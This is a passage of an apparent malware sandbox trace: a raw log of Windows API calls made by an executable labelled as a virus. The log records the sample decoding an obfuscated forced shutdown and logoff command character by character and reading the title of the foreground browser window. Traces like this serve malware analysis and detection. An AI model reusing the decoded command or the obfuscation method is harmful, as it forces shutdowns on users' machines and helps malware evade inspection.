(lpMsg=0x28f5e8) returned 0x1 [0176.919] GetExitCodeThread (in: hThread=0x124, lpExitCode=0x28f4c0 | out: lpExitCode=0x28f4c0) returned 1 [0176.919] ResumeThread (hThread=0x124) returned 0x0 [0176.924] SetThreadPriority (hThread=0x124, nPriority=0) returned 1 [0176.924] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 0 [0176.924] GetTickCount () returned 0x1d18fc0 [0176.925] IsWindowVisible (hWnd=0x103b8) returned 0 [0176.925] Sleep (dwMilliseconds=0x0) [0176.986] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0176.986] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0176.988] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0176.988] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0176.988] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0176.988] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0176.989] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0176.989] GetTickCount () returned 0x1d18ffe [0176.989] GetTickCount () returned 0x1d18ffe [0176.990] GetTickCount () returned 0x1d18ffe [0176.990] GetTickCount () returned 0x1d18ffe [0176.990] IsWindowVisible (hWnd=0x103b8) returned 0 [0176.990] Sleep (dwMilliseconds=0x0) [0177.048] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0177.049] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0177.050] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0177.050] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0177.050] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0177.050] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0177.051] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0177.051] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0177.051] IsWindow (hWnd=0x103bc) returned 1 [0177.051] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0177.051] IsIconic (hWnd=0x103b8) returned 0 [0177.051] GetParent (hWnd=0x103bc) returned 0x103b8 [0177.051] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0177.051] DispatchMessageA (lpMsg=0x28f5e8) returned 0x0 [0177.051] KillTimer (hWnd=0x103bc, uIDEvent=0x103bc) returned 1 [0177.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.052] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0177.052] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.052] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0177.053] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.053] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0177.053] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.054] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.054] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.055] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0177.055] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.056] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0177.056] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.057] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0177.058] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.058] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0177.059] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.060] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.209] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.210] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.210] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.211] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0177.211] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.212] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.212] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.212] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.213] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.213] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0177.213] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.214] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.214] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.215] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.215] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.216] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.222] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.223] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.223] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.224] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.224] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.225] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.225] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0177.226] GetForegroundWindow () returned 0x10162 [0177.226] GetLastError () returned 0x0 [0177.226] SysStringLen (param_1=" ") returned 0xff [0177.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0177.226] SysStringLen (param_1=" ") returned 0xff [0177.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0177.226] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0177.227] GetLastError () returned 0x0 [0177.227] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0177.227] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0177.227] SysStringLen (param_1="Bl") returned 0x2 [0177.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Bl", cchWideChar=3, lpMultiByteStr=0x11684fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bl", lpUsedDefaultChar=0x0) returned 3 [0177.228] SetWindowTextA (hWnd=0x103c4, lpString="Bl") returned 1 [0177.228] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0177.228] GetFocus () returned 0x0 [0177.228] lstrlenA (lpString="Bl") returned 2 [0177.228] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0177.228] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=3 | out: lpString="Bl") returned 2 [0177.228] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0177.229] GetFocus () returned 0x0 [0177.229] lstrcmpA (lpString1="Bl", lpString2="Bl") returned 0 [0177.229] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0177.229] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0177.229] GetFocus () returned 0x0 [0177.229] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0177.230] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0177.230] GetFocus () returned 0x0 [0177.230] 